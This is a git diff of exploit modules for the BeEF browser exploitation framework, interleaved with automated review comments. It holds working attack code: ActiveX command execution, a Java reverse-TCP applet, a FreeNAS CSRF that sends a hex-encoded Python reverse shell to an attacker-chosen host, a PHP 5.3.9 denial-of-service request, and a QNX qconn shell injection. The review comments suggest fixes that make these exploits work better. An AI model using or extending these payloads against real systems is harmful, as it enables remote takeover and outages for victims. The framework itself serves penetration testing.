newline at end of file +}); diff --git a/modules/exploits/jboss_jmx_upload_exploit/config.yaml b/modules/exploits/jboss_jmx_upload_exploit/config.yaml index 880a582a3..457c4efba 100644 --- a/modules/exploits/jboss_jmx_upload_exploit/config.yaml +++ b/modules/exploits/jboss_jmx_upload_exploit/config.yaml 
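Review bot: Both new `beef.net.forge_request(...)` calls in the `@@ -43,11 +34,11 @@` hunk pass thirteen positional arguments, four of them `null`, with nothing to say which slot is which, and both status checks use loose equality (`response.status_code == 200`). A one-line comment above the first call naming the positional arguments, plus `response.status_code === 200` in both callbacks, would make the move away from `beef.net.request` checkable by eye. The context comment just above still explains the `'script'` data type in terms of jQuery's `error()` event; that explanation presumably dates from the old `"success"` string check and should be re-read against the numeric comparison. The enclosing `beef.execute` callback starts before the hunk and its failure branches are only partly visible.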
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: @@ -23,3 +13,4 @@ beef: authors: ["antisnatchor", "l33tb0y"] target: working: ["ALL"] + not_working: "O" diff --git a/modules/exploits/jboss_jmx_upload_exploit/module.rb b/modules/exploits/jboss_jmx_upload_exploit/module.rb index a5345cdb6..e18541ab3 100644 --- a/modules/exploits/jboss_jmx_upload_exploit/module.rb +++ b/modules/exploits/jboss_jmx_upload_exploit/module.rb 
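Review bot: The line added in the `@@ -23,3 +13,4 @@` hunk, `not_working: "O"`, is a bare string, while `working: ["ALL"]` on the line above it and the `not_working: ["IE", "O"]` added to glassfish_war_upload_xsrf/config.yaml in this same commit are lists. Whether the config loader accepts both shapes is not visible in this diff, so I would keep one form: `not_working: ["O"]`. The entry also excludes a browser that `working: ["ALL"]` includes, so a short YAML comment on which key takes precedence would help the next reader.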
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Jboss_jmx_upload_exploit < BeEF::Core::Command diff --git a/modules/exploits/local_host/activex_command_execution/command.js b/modules/exploits/local_host/activex_command_execution/command.js new file mode 100755 index 000000000..4d3e7cd71 --- /dev/null +++ b/modules/exploits/local_host/activex_command_execution/command.js @@ -0,0 +1,25 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var cmd = '<%= @cmd.gsub(/'/, "\\'") %>'; + var result = "command was not sent"; + + try { + var shell = new ActiveXObject('WSCRIPT.Shell').Run(cmd); + if (shell.toString() == 0) { + result = "command sent"; + } else { + result = "command failed"; + } + } catch(e) { + result = "command failed"; + } + + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result); + +}); diff --git a/modules/exploits/local_host/activex_command_execution/config.yaml b/modules/exploits/local_host/activex_command_execution/config.yaml new file mode 100755 index 000000000..96022b207 --- /dev/null 
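Review bot: In activex_command_execution/command.js, `var shell = new ActiveXObject('WSCRIPT.Shell').Run(cmd);` stores the return value of `Run`, not a shell object, and the following `shell.toString() == 0` compares a string with a number through loose equality. Naming the variable for what it holds and comparing it directly reads more clearly: `var rc = new ActiveXObject('WSCRIPT.Shell').Run(cmd);` followed by `if (rc === 0) {`. The `catch(e)` branch reports the same `"command failed"` text as the non-zero branch, so the two outcomes cannot be told apart in the stored result; a distinct message for the exception path would keep the record accurate.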
+++ b/modules/exploits/local_host/activex_command_execution/config.yaml @@ -0,0 +1,16 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + activex_command_execution: + enable: true + category: ["Exploits", "Local Host"] + name: "ActiveX Command Execution" + description: "Execute arbitrary commands using the \"WSCRIPT.Shell\" object. The command response is not returned to BeEF.

The browser must have \"Initialize and script ActiveX controls not marked as safe for scripting\" enabled." + authors: ["bcoles"] + target: + user_notify: ["IE"] + not_working: ["ALL"] diff --git a/modules/exploits/local_host/activex_command_execution/module.rb b/modules/exploits/local_host/activex_command_execution/module.rb new file mode 100755 index 000000000..20e0915dc --- /dev/null +++ b/modules/exploits/local_host/activex_command_execution/module.rb @@ -0,0 +1,18 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Activex_command_execution < BeEF::Core::Command + + def self.options + return [ + {'name' => 'cmd', 'ui_label'=>'Command', 'type' => 'textarea', 'value' =>'cmd.exe /c "echo Hello from BeEF! & pause"', 'width' => '400px', 'height' => '50px'} + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/java_payload/AppletReverseTCP-0.2.jar b/modules/exploits/local_host/java_payload/AppletReverseTCP-0.2.jar similarity index 100% rename from modules/exploits/java_payload/AppletReverseTCP-0.2.jar rename to modules/exploits/local_host/java_payload/AppletReverseTCP-0.2.jar diff --git a/modules/exploits/java_payload/AppletReverseTCP-0.3rc1.jar b/modules/exploits/local_host/java_payload/AppletReverseTCP-0.3rc1.jar similarity index 100% rename from modules/exploits/java_payload/AppletReverseTCP-0.3rc1.jar rename to modules/exploits/local_host/java_payload/AppletReverseTCP-0.3rc1.jar diff --git a/modules/exploits/java_payload/command.js b/modules/exploits/local_host/java_payload/command.js similarity index 73% rename from modules/exploits/java_payload/command.js rename to modules/exploits/local_host/java_payload/command.js index 8ebcfcc28..f8938107f 100755 --- a/modules/exploits/java_payload/command.js +++ b/modules/exploits/local_host/java_payload/command.js 
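Review bot: `not_working: ["ALL"]` in activex_command_execution/config.yaml is written in upper case, while the other local_host configs added in this commit use `not_working: ["All"]` (safari_launch_app, window_mail_client_dos) and `user_notify: ["All"]` (java_payload). Whether the target matcher is case-sensitive is not visible in this diff, so one spelling should be used throughout. `["ALL"]` matches the `working: ["ALL"]` already used by the jboss_jmx_upload_exploit and hp_ucmdb_add_user_csrf configs.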
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var conn = '<%= @conn %>'; diff --git a/modules/exploits/local_host/java_payload/config.yaml b/modules/exploits/local_host/java_payload/config.yaml new file mode 100755 index 000000000..47bb3370d --- /dev/null +++ b/modules/exploits/local_host/java_payload/config.yaml @@ -0,0 +1,16 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + java_payload: + enable: true + category: ["Exploits", "Local Host"] + name: "Java Payload" + description: "Inject a malicious signed Java Applet (JavaPayload) that connects back to the attacker giving basic shell commands, command exec and wget.

Before launching it, be sure to have the JavaPayload StagerHandler listening,
i.e.: java javapayload.handler.stager.StagerHandler <payload> <IP> <port> -- JSh

Windows Vista is not supported." + authors: ["antisnatchor"] + target: + not_working: ["FF"] + user_notify: ["All"] diff --git a/modules/exploits/java_payload/module.rb b/modules/exploits/local_host/java_payload/module.rb similarity index 54% rename from modules/exploits/java_payload/module.rb rename to modules/exploits/local_host/java_payload/module.rb index 2f3380bc7..5f83c6f18 100755 --- a/modules/exploits/java_payload/module.rb +++ b/modules/exploits/local_host/java_payload/module.rb @@ -1,22 +1,12 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Java_payload < BeEF::Core::Command def pre_send - BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/java_payload/AppletReverseTCP-0.2.jar', '/anti', 'jar') + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/java_payload/AppletReverseTCP-0.2.jar', '/anti', 'jar') end def self.options 
diff --git a/modules/exploits/mozilla_nsiprocess_interface/command.js b/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js similarity index 58% rename from modules/exploits/mozilla_nsiprocess_interface/command.js rename to modules/exploits/local_host/mozilla_nsiprocess_interface/command.js index 758a5dea5..bbf2f434b 100644 --- a/modules/exploits/mozilla_nsiprocess_interface/command.js +++ b/modules/exploits/local_host/mozilla_nsiprocess_interface/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var result = "command sent"; diff --git a/modules/exploits/mozilla_nsiprocess_interface/config.yaml b/modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml similarity index 59% rename from modules/exploits/mozilla_nsiprocess_interface/config.yaml rename to modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml index 7e1b71cd2..97be87d19 100644 --- a/modules/exploits/mozilla_nsiprocess_interface/config.yaml +++ b/modules/exploits/local_host/mozilla_nsiprocess_interface/config.yaml 
@@ -1,23 +1,13 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: mozilla_nsiprocess_interface: enable: false - category: "Exploits" + category: ["Exploits", "Local Host"] name: "Mozilla nsIProcess XPCOM Interface (Windows)" description: "The nsIProcess XPCOM interface represents an executable process. JavaScript code with chrome privileges can use the nsIProcess interface to launch executable files. In this module, nsIProcess is combined with the Windows command prompt cmd.exe

Any XSS injection in a chrome privileged zone (e.g. typically in Firefox extensions) allows this module to execute arbitrary commands on the victim machine." authors: ["wade", "bcoles", "roberto.suggi@security-assessment.com", "nick.freeman@security-assessment.com"] diff --git a/modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb b/modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb new file mode 100644 index 000000000..74f7874bd --- /dev/null +++ b/modules/exploits/local_host/mozilla_nsiprocess_interface/module.rb @@ -0,0 +1,22 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +# This module is a port of the same module from BeEF-0.4.0.0 +# It has not been tested +class Mozilla_nsiprocess_interface < BeEF::Core::Command + + def self.options + return [ + {'name' => 'ports', 'ui_label' => 'Windows Command', 'value' => 'ping localhost'} + ] + end + + def post_execute + content = {} + content['result'] = @datastore['result'] + save content + end + +end diff --git a/modules/exploits/local_host/safari_launch_app/command.js b/modules/exploits/local_host/safari_launch_app/command.js new file mode 100755 index 000000000..10b0fefb4 --- /dev/null +++ b/modules/exploits/local_host/safari_launch_app/command.js 
@@ -0,0 +1,14 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + var baseTag = document.createElement('base'); + baseTag.setAttribute('id', 'sla_<%= @command_id %>'); + baseTag.setAttribute('href', 'file://'); + document.head.appendChild(baseTag); + setTimeout('document.location="<%= @app_path %>";beef.net.send("<%= @command_url %>", <%= @command_id %>, "Command [<%= @app_path %>] launched");', 1000); + setTimeout('document.head.removeChild(document.getElementById("sla_<%= @command_id %>"));beef.net.send("<%= @command_url %>", <%= @command_id %>, "Base tag removed");', 1000); +}); diff --git a/modules/exploits/local_host/safari_launch_app/config.yaml b/modules/exploits/local_host/safari_launch_app/config.yaml new file mode 100755 index 000000000..9d68e8df5 --- /dev/null +++ b/modules/exploits/local_host/safari_launch_app/config.yaml @@ -0,0 +1,16 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + safari_launch_app: + enable: true + category: ["Exploits", "Local Host"] + name: "Safari Launch App" + description: "Launch an application from the victim machine.
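Review bot: Both `setTimeout` calls in safari_launch_app/command.js take their handler as a string, with `<%= @app_path %>` and `<%= @command_id %>` interpolated inside two levels of quoting, so any quote character in the option value changes the evaluated code. Function callbacks that close over `baseTag` avoid the string evaluation and the `getElementById` lookup, for example `setTimeout(function() { document.head.removeChild(baseTag); }, 1000);`. The two `beef.net.send` messages also lack the `result=` prefix that other modules in this commit use (`"result=Command executed"`), and the matching module.rb defines no `post_execute`, so how these messages are stored cannot be confirmed from this diff.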

See CVE-2011-3230 for more details.

Safari <= 5.1 on OS X is vulnerable. Original discovery by Aaron Sigel." + authors: ["antisnatchor"] + target: + user_notify: ["S"] + not_working: ["All"] diff --git a/modules/exploits/local_host/safari_launch_app/module.rb b/modules/exploits/local_host/safari_launch_app/module.rb new file mode 100755 index 000000000..2e3928be0 --- /dev/null +++ b/modules/exploits/local_host/safari_launch_app/module.rb @@ -0,0 +1,14 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Safari_launch_app < BeEF::Core::Command + + def self.options + return [ + {'name'=>'app_path', 'ui_label' => 'Application', 'value' => '/usr/sbin/netstat'}, + ] + end + +end diff --git a/modules/exploits/window_mail_client_dos/command.js b/modules/exploits/local_host/window_mail_client_dos/command.js similarity index 58% rename from modules/exploits/window_mail_client_dos/command.js rename to modules/exploits/local_host/window_mail_client_dos/command.js index 38eebf375..cebf54b9c 100644 --- a/modules/exploits/window_mail_client_dos/command.js +++ b/modules/exploits/local_host/window_mail_client_dos/command.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { // container iframe diff --git a/modules/exploits/local_host/window_mail_client_dos/config.yaml b/modules/exploits/local_host/window_mail_client_dos/config.yaml new file mode 100644 index 000000000..bdb6cf69f --- /dev/null +++ b/modules/exploits/local_host/window_mail_client_dos/config.yaml @@ -0,0 +1,16 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + windows_mail_client_dos: + enable: true + category: ["Exploits", "Local Host"] + name: "Windows Mail Client DoS" + description: "This module exploits an unhandled exception in Windows Mail to crash the client remotely.

Windows Mail is launched and then crashed if it is not already open. It comes installed by default on Windows Vista (but it's also vulnerable on Windows 7 SP2).

The protocol handler used will be: nntp." + authors: ["bcoles"] + target: + user_notify: ["FF", "S"] + not_working: ["All"] diff --git a/modules/exploits/local_host/window_mail_client_dos/module.rb b/modules/exploits/local_host/window_mail_client_dos/module.rb new file mode 100644 index 000000000..64860d890 --- /dev/null +++ b/modules/exploits/local_host/window_mail_client_dos/module.rb @@ -0,0 +1,8 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Windows_mail_client_dos < BeEF::Core::Command + +end diff --git a/modules/exploits/mozilla_nsiprocess_interface/module.rb b/modules/exploits/mozilla_nsiprocess_interface/module.rb deleted file mode 100644 index d69389b9f..000000000 --- a/modules/exploits/mozilla_nsiprocess_interface/module.rb +++ /dev/null @@ -1,32 +0,0 @@ -# -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# -# This module is a port of the same module from BeEF-0.4.0.0 -# It has not been tested -class Mozilla_nsiprocess_interface < BeEF::Core::Command - - def self.options - return [ - {'name' => 'ports', 'ui_label' => 'Windows Command', 'value' => 'ping localhost'} - ] - end - - def post_execute - content = {} - content['result'] = @datastore['result'] - save content - end - -end 
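Review bot: The description in the new window_mail_client_dos/config.yaml says the client is "also vulnerable on Windows 7 SP2", which looks like a typo, since as far as I know Windows 7 shipped only SP1. The text should name the build that was actually tested, so anyone scoping exposure is not misled. The directory is `window_mail_client_dos` while the module key and class are `windows_mail_client_dos` / `Windows_mail_client_dos`, which makes the module harder to find by name. `not_working: ["All"]` also differs in case from the `working: ["ALL"]` used by other modules in this commit. Whether the loader is case-sensitive is not visible here, so confirm it and normalise to `not_working: ["ALL"]`.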
diff --git a/modules/exploits/nas/freenas_reverse_root_shell_csrf/command.js b/modules/exploits/nas/freenas_reverse_root_shell_csrf/command.js new file mode 100644 index 000000000..560fd34e0 --- /dev/null +++ b/modules/exploits/nas/freenas_reverse_root_shell_csrf/command.js @@ -0,0 +1,25 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + var rhost = '<%= @rhost %>'; + var rport = '<%= @rport %>'; + var lhost = '<%= @lhost %>'; + var lport = '<%= @lport %>'; + var sid = Math.floor(Math.random()*1000)+1; + + var freenas_add_user_iframe = beef.dom.createInvisibleIframe(); + freenas_add_user_iframe.setAttribute('src', 'http://'+rhost+':'+rport+'/system/terminal/?s='+sid+'&k=%70%79%74%68%6f%6e%20%2d%63%20%22%69%6d%70%6f%72%74%20%73%6f%63%6b%65%74%2c%73%75%62%70%72%6f%63%65%73%73%2c%6f%73%3b%68%6f%73%74%3d%5c%22'+lhost+'%5c%22%3b%70%6f%72%74%3d'+lport+'%3b%73%3d%73%6f%63%6b%65%74%2e%73%6f%63%6b%65%74%28%73%6f%63%6b%65%74%2e%41%46%5f%49%4e%45%54%2c%73%6f%63%6b%65%74%2e%53%4f%43%4b%5f%53%54%52%45%41%4d%29%3b%73%2e%63%6f%6e%6e%65%63%74%28%28%68%6f%73%74%2c%70%6f%72%74%29%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%30%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%31%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%32%29%3b%70%3d%73%75%62%70%72%6f%63%65%73%73%2e%63%61%6c%6c%28%5b%5c%22%2f%62%69%6e%2f%73%68%5c%22%2c%5c%22%2d%69%5c%22%5d%29%3b%22%0d'); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + cleanup = function() { + document.body.removeChild(freenas_add_user_iframe); + } + setTimeout("cleanup()", 15000); + +}); + 
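Review bot: `cleanup` is assigned without `var` and scheduled with the string form `setTimeout("cleanup()", 15000)`, so it becomes a global on the hooked page and is evaluated as code. If two modules run within 15 seconds of each other, the second overwrites the first's `cleanup`, the first iframe is never removed and the later timer calls `removeChild` on a node that is already gone. Passing a closure keeps it local: `setTimeout(function() { document.body.removeChild(freenas_add_user_iframe); }, 15000);`. The same pattern is in the new command.js files for qnx_qconn_command_execution, 3com_officeconnect_cmd_exec, asmax_ar804gu_cmd_exec and cisco_e2400_csrf. The name `freenas_add_user_iframe` also looks copied from another module, since nothing in this hunk adds a user.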
diff --git a/modules/exploits/nas/freenas_reverse_root_shell_csrf/config.yaml b/modules/exploits/nas/freenas_reverse_root_shell_csrf/config.yaml new file mode 100644 index 000000000..e4074df92 --- /dev/null +++ b/modules/exploits/nas/freenas_reverse_root_shell_csrf/config.yaml @@ -0,0 +1,18 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +################################################################################ +# For more information see: http://support.freenas.org/ticket/1788 +################################################################################ +beef: + module: + freenas_reverse_root_shell_csrf: + enable: true + category: ["Exploits", "NAS"] + name: "FreeNAS Reverse Root Shell CSRF" + description: "Attempts to get a reverse root shell on a FreeNAS server.
Tested on version 8.2.0 however other versions are likely to be vulnerable.
Patched in version 8.3.0-BETA3." + authors: ["bcoles"] + target: + working: ["ALL"] diff --git a/modules/exploits/nas/freenas_reverse_root_shell_csrf/module.rb b/modules/exploits/nas/freenas_reverse_root_shell_csrf/module.rb new file mode 100644 index 000000000..ab9ffe2f4 --- /dev/null +++ b/modules/exploits/nas/freenas_reverse_root_shell_csrf/module.rb @@ -0,0 +1,27 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +################################################################################ +# For more information see: http://support.freenas.org/ticket/1788 +################################################################################ +class Freenas_reverse_root_shell_csrf < BeEF::Core::Command + + def self.options + configuration = BeEF::Core::Configuration.instance + lhost = "#{configuration.get("beef.http.host")}" + lhost = "" if lhost == "0.0.0.0" + return [ + { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'}, + { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' }, + { 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost}, + { 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444'}, + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/php-5.3.9-dos/command.js b/modules/exploits/php-5.3.9-dos/command.js new file mode 100644 index 000000000..6f03ea12f --- /dev/null +++ b/modules/exploits/php-5.3.9-dos/command.js 
@@ -0,0 +1,52 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + +// Simple proof of concept for PHP 5.3.9 DoS bug (CVE-2012-0830) +// PoC written by Paul Westin +// PoC ported to BeEF by bcoles +// Bug discovered by Stefan Esser (@i0n1c) +// For more information see http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/ + +// Generate 1000 normal keys and one array +function createEvilObj () { + var evil_obj = {}; + for (var i = 0; i < 1001; i++) { + evil_obj[i] = 1; + } + evil_obj['kill[]'] = 'kill'; + return evil_obj; +} + +// Serialize Javascript object into POST data +function serializeObj (obj) { + var str = []; + for(var p in obj) { + str.push(p + "=" + obj[p]); + } + return str.join("&"); +} + +// Run attack +function attackSite (target_url) { + var bad = serializeObj(createEvilObj()); + var xhr = new XMLHttpRequest(); + xhr.open("POST", target_url, true); + xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded'); + xhr.setRequestHeader('Content-Length', bad.length); + xhr.send(bad); +} + +try { + attackSite("<%= @url %>"); + beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=request sent"); +} catch (e) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, "result=request failed&error="+e.toString()); +} + +}); + diff --git a/modules/exploits/php-5.3.9-dos/config.yaml b/modules/exploits/php-5.3.9-dos/config.yaml new file mode 100644 index 000000000..3617825ba --- /dev/null +++ b/modules/exploits/php-5.3.9-dos/config.yaml 
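Review bot: `xhr.setRequestHeader('Content-Length', bad.length);` in `attackSite` is dead code, because Content-Length is a forbidden header name for XMLHttpRequest and the browser computes it itself; some browsers log a refusal. The line can simply be removed. The `try` block also reports `result=request sent` straight after the asynchronous `send()`, so the stored result only shows that the call did not throw. A comment such as `// "request sent" means send() did not throw; delivery is not confirmed` would keep the log from being read as confirmation.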
@@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + php_dos: + enable: true + category: "Exploits" + name: "PHP 5.3.9 DoS" + description: "This module uses the zombie browser to exploit a denial of service bug in PHP 5.3.9 (CVE-2012-0830).

For more information, see http://thexploit.com/sec/critical-php-remote-vulnerability-introduced-in-fix-for-php-hashtable-collision-dos/." + authors: ["bcoles", "Paul Westin", "Stefan Esser"] + target: + unknown: ["ALL"] diff --git a/modules/exploits/php-5.3.9-dos/module.rb b/modules/exploits/php-5.3.9-dos/module.rb new file mode 100644 index 000000000..6044f3550 --- /dev/null +++ b/modules/exploits/php-5.3.9-dos/module.rb @@ -0,0 +1,21 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Php_dos < BeEF::Core::Command + + def self.options + return [ + {'name' => 'url', 'ui_label' => 'Target URL', 'type' => 'textarea', 'value' =>'http://example.com/index.php', 'width' => '400px', 'height' => '50px'} + ] + end + + def post_execute + content = {} + content['result'] = @datastore['result'] + save content + end + +end + diff --git a/modules/exploits/qnx_qconn_command_execution/command.js b/modules/exploits/qnx_qconn_command_execution/command.js new file mode 100644 index 000000000..cffcf9489 --- /dev/null +++ b/modules/exploits/qnx_qconn_command_execution/command.js 
@@ -0,0 +1,43 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var rhost = '<%= @rhost %>'; + var rport = '<%= @rport %>'; + var timeout = '<%= @timeout %>'; + + // validate payload + try { + var cmd = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>'; + var payload = '\r\nservice launcher\r\nstart/flags run /bin/sh /bin/sh -c "'+cmd+'"\r\n' + } catch(e) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString()); + return; + } + + // validate target details + if (!rport || !rhost || isNaN(rport)) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port'); + return; + } + if (rport > 65535 || rport < 0) { + beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port'); + return; + } + + // send commands + var qnx_iframe = beef.dom.createIframeIpecForm(rhost, rport, payload); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + // clean up + cleanup = function() { + document.body.removeChild(qnx_iframe); + } + setTimeout("cleanup()", timeout*1000); + +}); + diff --git a/modules/exploits/qnx_qconn_command_execution/config.yaml b/modules/exploits/qnx_qconn_command_execution/config.yaml new 